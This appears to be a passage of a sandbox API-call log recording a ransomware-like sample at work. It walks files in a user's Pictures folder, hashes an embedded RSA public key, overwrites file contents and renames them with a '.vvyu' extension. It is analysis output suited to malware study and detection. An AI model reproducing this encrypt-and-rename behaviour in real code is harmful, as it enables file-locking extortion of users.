RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc58 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc28 | out: hHeap=0x2c0000) returned 1 [0190.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af30c0 | out: hHeap=0x2c0000) returned 1 [0190.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.289] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16e73, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16e73, lpOverlapped=0x0) returned 1 [0190.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.290] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16e78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.290] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.291] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.292] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.292] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.292] CloseHandle (hObject=0x584) returned 1 [0190.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.294] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\7p5JBw.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\7p5jbw.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\7p5JBw.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\7p5jbw.jpg.vvyu")) returned 1 [0190.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.307] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.310] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e08dfd0, ftCreationTime.dwHighDateTime=0x1d8a4b9, ftLastAccessTime.dwLowDateTime=0x6be78d20, ftLastAccessTime.dwHighDateTime=0x1d8a5cf, ftLastWriteTime.dwLowDateTime=0x6be78d20, ftLastWriteTime.dwHighDateTime=0x1d8a5cf, nFileSizeHigh=0x0, nFileSizeLow=0x1d54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="877l5thXMZRFuEmTVa.png", cAlternateFileName="877L5T~1.PNG")) returned 1 [0190.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af30c0 [0190.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0190.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af30c0 | out: hHeap=0x2c0000) returned 1 [0190.310] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\877l5thXMZRFuEmTVa.png") returned=".png" [0190.310] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\877l5thXMZRFuEmTVa.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\877l5thxmzrfuemtva.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.311] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=7508) returned 1 [0190.311] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.314] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1d2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.315] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.319] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.319] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1d54, lpOverlapped=0x0) returned 1 [0190.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.320] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.322] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.322] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.322] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.322] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.322] GetLastError () returned 0x0 [0190.322] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.322] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.322] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.322] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.322] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d50) returned 0x2ae5ea0 [0190.323] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af30c0 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3108 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.324] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc88 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dc70 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.327] GetCurrentThreadId () returned 0x5d8 [0190.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4c38 [0190.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.328] GetCurrentThreadId () returned 0x5d8 [0190.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc88 [0190.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.332] RtlAllocateHeap (HeapHandle=0x2c0000, 